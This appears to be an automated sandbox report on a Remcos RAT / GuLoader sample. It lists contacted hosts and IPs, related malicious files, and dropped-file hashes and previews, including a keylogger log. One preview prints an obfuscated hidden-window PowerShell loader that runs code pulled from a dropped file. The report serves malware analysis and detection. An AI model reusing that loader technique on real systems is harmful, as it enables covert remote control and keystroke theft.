                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://geoplugin.net/json.gpSwab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://www.microsoft.Ccpowershell.exe, 00000001.00000002.2238813435.0000000007BAF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://www.google.com/accounts/serviceloginwab.exefalse
                                        high
                                        https://login.yahoo.com/config/loginwab.exefalse
                                          high
                                          http://www.nirsoft.net/wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2236066946.0000000005511000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microqpowershell.exe, 00000001.00000002.2238813435.0000000007BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.ebuddy.comwab.exe, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                172.93.222.219
                                                unknownUnited States
                                                23033WOWUSfalse
                                                178.237.33.50
                                                geoplugin.netNetherlands
                                                8455ATOM86-ASATOM86NLfalse
                                                209.90.234.20
                                                unknownUnited States
                                                136175SERVERHOSH-AS-APServerhoshInternetServiceNLtrue
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1429605
                                                Start date and time:2024-04-22 13:32:10 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 46s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:87tBuE42ft.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:1353d2318463be28ebcffe36398b90b873ee21e2bde3d03f929103729c4b95ea.exe
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@20/17@1/3
                                                EGA Information:
                                                • Successful, ratio: 83.3%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 204
                                                • Number of non-executed functions: 235
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target powershell.exe, PID 6260 because it is empty
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                TimeTypeDescription
                                                13:33:11API Interceptor43x Sleep call for process: powershell.exe modified
                                                13:34:29API Interceptor5143292x Sleep call for process: wab.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                178.237.33.50Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • geoplugin.net/json.gp
                                                HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • geoplugin.net/json.gp
                                                rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • geoplugin.net/json.gp
                                                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                geoplugin.netPurchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                SERVERHOSH-AS-APServerhoshInternetServiceNLhttp://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                http://213.139.205.131/w_ver.datGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                ReleaseEvans#27.docmGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                Application#89.docmGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                ReleaseEvans#90.docmGet hashmaliciousUnknownBrowse
                                                • 213.139.205.131
                                                qvX9Cyuqyq.exeGet hashmaliciousPureLog Stealer, Vidar, XmrigBrowse
                                                • 213.139.207.234
                                                G0k5A7CSy7.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                • 213.139.207.234
                                                UJb7fpXCyP.exeGet hashmaliciouszgRATBrowse
                                                • 213.139.207.234
                                                2zozpLXCMr.exeGet hashmaliciouszgRATBrowse
                                                • 213.139.207.234
                                                ATOM86-ASATOM86NLPurchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                WOWUSVbVGKkKgdbEScfW.scrGet hashmaliciousNanocore, PureLog StealerBrowse
                                                • 192.169.69.26
                                                dxM4ij1KkuoBK3H.scrGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                Q00D5u1xHq.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 208.115.121.80
                                                SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                                • 45.14.115.125
                                                wgnD5cuT6o.exeGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.25
                                                Udx2BpoMA3.elfGet hashmaliciousMiraiBrowse
                                                • 208.115.121.72
                                                QSpd4lVL1o.exeGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                ZDKv0w0UwA.elfGet hashmaliciousUnknownBrowse
                                                • 208.115.121.76
                                                4MknBqpM97.exeGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                48qIUWNmZh.exeGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                No context
                                                No context
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.379519383183141
                                                Encrypted:false
                                                SSDEEP:3:rhlKl+nFlN1l3U5JWRal2Jl+7R0DAlBG45klovDl6v:6l+FdC5YcIeeDAlOWAv
                                                MD5:20000CAFA4F6538C8347B3C7BFD1C4F7
                                                SHA1:24FDBE6A9428B832DA512F9598EE47D9E9833A5E
                                                SHA-256:23B0CA15807A5F2D9B8F0E6147FF9B812410CD4113F1C7985B4D02E8C12005A6
                                                SHA-512:6737FFFC12F1AEB5846C2DFDD1364DABCA41A93E9CD83A69FFFC457658E9D724DA490711AC6EA1451790025EB80411E24CEBDF9F620DFC11895E721E3AFFC085
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Reputation:low
                                                Preview:....[.2.0.2.4./.0.4./.2.2. .1.3.:.3.3.:.5.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):963
                                                Entropy (8bit):4.995921748950886
                                                Encrypted:false
                                                SSDEEP:12:tklzTknd6UGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7R+2:qlkdVauKyGX855vXhNlT3/77Kdxtro
                                                MD5:57C36A4D45733B4304D0ED59EDA89921
                                                SHA1:D304B73EE632B7839808A761FDC19CD23280D62E
                                                SHA-256:C6C00D5FC9257C069D61A76B5C8C8762F9EE120F8C7BBFC157D3169C24D95F8F
                                                SHA-512:1DE275B4992B9EB368BF0DA068812FC43E30FAEAC2CFCD0BF5DFF823479D6B3758D5F74078123DA46A0671F217FB2BE5D53D79A641D7BE6DB9ECEAE6F0F4FDC7
                                                Malicious:false
                                                Reputation:low
                                                Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):8003
                                                Entropy (8bit):4.838950934453595
                                                Encrypted:false
                                                SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                Malicious:false
                                                Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):241
                                                Entropy (8bit):4.935023455585147
                                                Encrypted:false
                                                SSDEEP:6:9/sLBJtx5JMe0FDjAuwknaZ5pSzoDMyHU12XNGKL/dd:9/6b9iN8prHpZh0127rdd
                                                MD5:C6C0ED9FB2981F682970677EFA50E1C7
                                                SHA1:35412F3F908ED010F06B66E8B19924D968EACA1E
                                                SHA-256:5861915475FD028434B5D9B06DE3C661DD7590F8062E667A5FB953C59AFB76A5
                                                SHA-512:348ACC7C116C395F419D3C007996B68E118D01EAE589A9CD9AED8530A9FB58AE72FD2F477B977D92076EFA4CEA37EC0C7484C8714F7EBB6B5A3770D1C6CE896C
                                                Malicious:false
                                                Preview:[Car App]..Show="-windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)"..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):15728640
                                                Entropy (8bit):0.10805027086476268
                                                Encrypted:false
                                                SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                Malicious:false
                                                Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):409732
                                                Entropy (8bit):7.6016888194942664
                                                Encrypted:false
                                                SSDEEP:12288:NEZ0IZqoLb7HUYZHKRBQUf/wICV38k4idh2:HIZnLbIYZHKBQ4iK
                                                MD5:9D90F61BAACD1C6799591C789F17E8BB
                                                SHA1:1D66B9BCB262455B034ABB15D6BC01976DC67A9D
                                                SHA-256:ADFEFEA52E2288D489D3AAA7F4F90CB02BF60855E37F3217B241ED45D6FD8D81
                                                SHA-512:8E5AF3C979757B2B0D6E17581B838540B1422D09BF1652739B2522BA9601BF714A392BDE78825199FDF40072DB826EA2051ABC102043F4C1CDDABFA343D6D411
                                                Malicious:false
                                                Preview:........,...................=...p...........................................................................................................................................................................................................................................................G..._...........&...j...............................................................................................................................................#.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):533139
                                                Entropy (8bit):7.408219938796684
                                                Encrypted:false
                                                SSDEEP:12288:fnPdhsFldr2BFS3Cr3HUNdAfZBAfYKBuyhleDJB:vPdhoeBYSrHU7K9KBuRJB
                                                MD5:EF53493176B714D7C8C972A756CFD806
                                                SHA1:C7C08850F9DD1706A2A2A5B456F5DE2B25EB200C
                                                SHA-256:1353D2318463BE28EBCFFE36398B90B873EE21E2BDE3D03F929103729C4B95EA
                                                SHA-512:EAB8465A629001A43631724AAA9293C229286BEBB33C943CE197CE5F17419B9B91C6F9BE86C4DEC68D4B099871ABF3FA05807E99876FFA0EE3497F3A5ABAC2FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                • Antivirus: Virustotal, Detection: 33%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@.......................... ............@..........................................`...............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2366
                                                Entropy (8bit):4.862609945911126
                                                Encrypted:false
                                                SSDEEP:48:P/qCsUphZkRlb8+t2L1mXegV3CzO4dJh26IZORO4/kMd:XftkRlokRV3CzzqO7s6
                                                MD5:AC07ED52AF68DF01E9BED46B85D4A57F
                                                SHA1:4E16618F3E7CDC8EEA6C2335D48B092AE4788D19
                                                SHA-256:4D29476D032988D36D1ADCE0289FDD3A5B1640C5D6EBCD7FDF9A56CE7933BEAA
                                                SHA-512:D6610569C37E1A320C0E0356FB55EF21C5D7C4423D251E76749AD7C553C4D2AE15084E5B228A0361DE54C69E0BC8D7B03DC9AE776F72643ACEC6F3E28A9C74F9
                                                Malicious:false
                                                Preview:........................ "k...2...T.$........................Ju.+....(.........T...m....................-..K...I.T......b..............9.8.e.....m........R_u...K|.....R.hW).."WU.d...'.D..B...^.#.....*.-.G.....l.8......s..............'../..j......I..<....R.*............<.h..>..2.........)...".....G.9.+:...........F..............+................g!...%..z......].........H...q..x..#..L.....SC.....R...'..A..k.q......E./.....+.....e.~.F....`.K.........w....:).3....e...P........0..."..6#....)....b....a..s....,......X..:..g..........,....Y2.P...D............47...<.....)V...P....8.-t..........................U.>....0...........d...........A....0.9.......>.k..............{...U............R........|C.m....AM...!..s....t..|........Wv..`.......,.......................B..7................J.....Q..?....^..p........!...c..>..........pb....../.............Q....:.........z...e...E...............m........................5.......M.......j.#...|..A%I..hx.a.K.&..<=".9....u....'......#.....nP
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):477
                                                Entropy (8bit):4.260750178393622
                                                Encrypted:false
                                                SSDEEP:12:oIWGDz2+BLVNiomdDuA9J+5YnQ69MN3XxFUDp8UoVSOtFOHKZwX/z:VWGXv9TYUe+qnYXDUDp82OtfO7
                                                MD5:525C561099E7365508DD1BB0A3BC349C
                                                SHA1:53D2A5E9D56F2F23BA3430F6D57E91ADEEFE7445
                                                SHA-256:9B350D71FFE880E9838A783E9842E07F2294F6D5BC476AAE6AA9D037DC7ACB07
                                                SHA-512:1F0211823375283A71AFA227AF7E945A9F6DC16E6BB21F5CA7717210981CFC0D5414974E38E76EE728698D61E3252FD17A86F8D3A54AA675006AB535118C6172
                                                Malicious:false
                                                Preview:admiralskib ruggle forudindtagnes,bassly slibemiddelets solavekslers arbejdsministerier federalization skdeskindets langsynede,strafferet jittering lselyst uralitized nanette corespondency overrendte trafikofferet..ekspressionistisk linieafstands nglestillingers.satchelful knippe lkkersultnes dublets tillikes bosnisch delstater lunkhead..afpatruljerende gaeldsbrev hemoglobinopathy datamaterialerne ozonid squalliest polygonal misunion retunding langtidsplans sttimor bakli..
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2697
                                                Entropy (8bit):4.806863564104149
                                                Encrypted:false
                                                SSDEEP:48:kWglPY9uTJ1awqv2tPl/+FPECQl1UR2XA1Sw/bXkgV/rSRENVdhlZD5QMA:kZPYWJlqMYFlIyR29w/bXkgV/wE/tnI
                                                MD5:E72261B63AB50DDF6EEA22FBB8C317B4
                                                SHA1:6A522CE9D32532641DB143EA5DF5AE23B54CCB49
                                                SHA-256:E8EF6EBE9F67280AE8CFC7A9584DDCF3666F1A021C95AB912F9C67C30EC5A3FD
                                                SHA-512:47A9649571BB6B7A34E248AEE66AE96711841F67E30E61E36A3BCD7F3206FC7E6C52B3C73C1EF1B63ABF8B4261E86AAAD88318500213949FE45157B6B1E5B415
                                                Malicious:false
                                                Preview:...[......~....F..I..X1....-..(:.>...q.h..........!....u|TQ............j.........j.....a...4.e.....1.4....j..[...8.........E....S.q5......J.,P...............6....&...{.....o....b..`.....7..j..........~..!.........D...!.............*......^........8....j.g..................=...f..U}.....2].\....Q.......Y........................A..........v......Fq..61k.........P............j..r...... ..e......>.....Xm....f..B.*............ .k.............ok?......... ....8.Z1.U...k...A...b....*A.........q.............C......>..a.......~......a....[...P....8...K..$.#.....2E..+5.......9....?He......c.....1....... Y.,B........g............W.....vG...4...z...wF$.S.hx.\.c._..~6.............B..v.L...eO.q................6.umF...7.)...............................[....]..............m.../.[......p.......N........F...U..............C.......8D..b.....=.K..g..........g.......!..z..S.......-.[.C.h.......T.N3...2.~....S..F.......[..........a.y..z......v......y...U.......*......2............1.......P........
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):340182
                                                Entropy (8bit):7.682673680912387
                                                Encrypted:false
                                                SSDEEP:6144:SIHZjQAdZL2oLBDbEoX7HfsYZH8/3TrJBL6tUIevp1wIQZ3LplpsPg84p4ND:SEZ0IZqoLb7HUYZHKRBQUf/wICV38k4d
                                                MD5:FDF7C7DCC4871871D8BC9302BD01C148
                                                SHA1:9D1F26DFA0773D6EA821954992AE8D416D70D206
                                                SHA-256:D21E3DDF67C09B2192E823D2969D8F441023764D7D8E7554328AAA547C43604E
                                                SHA-512:A6ABD1B3B367701B22FCFEE8715820DAC0A0783A847545B3774FBC263213EF3ECAF8BC5D3EAF58BA486E4F0BD2001344A23DA962A5722ECA5CA44C57A4615DEE
                                                Malicious:false
                                                Preview:......///........k...VV...===.............k......................'................UU..HHH...........*..222.......O..""..C.....jjjjj..II..........&&&........>.............fff.........ss..................................Y.....................................OO.......................0......3....S......p..................99999.>>>...22......^...ii.D........1............n....$......................z..``.....""...........n...........OOOOO.mmm................e...................x........111.........S..a.f....C..........g.......2.99999999.uuuuuu........,,,,......66...........//...```...aaaaa....99.0...............QQ..............Q....l.................p.............................................DDDDD.........====..........................................f....uu.........................$..a.....;...........==.........pppp....K......C.......................222.gggg.......Q. ...((................N............UU...::..............L.WWW...........R..........OOO............&&&..............111...
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:ASCII text, with very long lines (55890), with no line terminators
                                                Category:dropped
                                                Size (bytes):55890
                                                Entropy (8bit):5.32986394828997
                                                Encrypted:false
                                                SSDEEP:768:stRSpMsDEBbiYzC9AUQg+Fj0VY6fgw8cl+ZzPhkrV439KaEJQkP5HF0GEFGRGI:uRUM0qbiCYYo3gnZzPKrOtKaiT8rE
                                                MD5:63D0C546B30964E943C2AC8FD5E236DB
                                                SHA1:7D46713CB1D3CBFE25EFCAF24369FB067D310920
                                                SHA-256:EB26AA5B4EC7A1C0C0AD2BE344C02A23F770815A40E84E5B1B5FE24C9B64EDDA
                                                SHA-512:91399FEC920E3BE9526E1AF39A632512C6C00CEA3566A9CE43FDBADF813C5B2B830620BFC381747B195A4E2C52B8EF4D81295B484EA6ED925979A97B8CF6A1ED
                                                Malicious:true
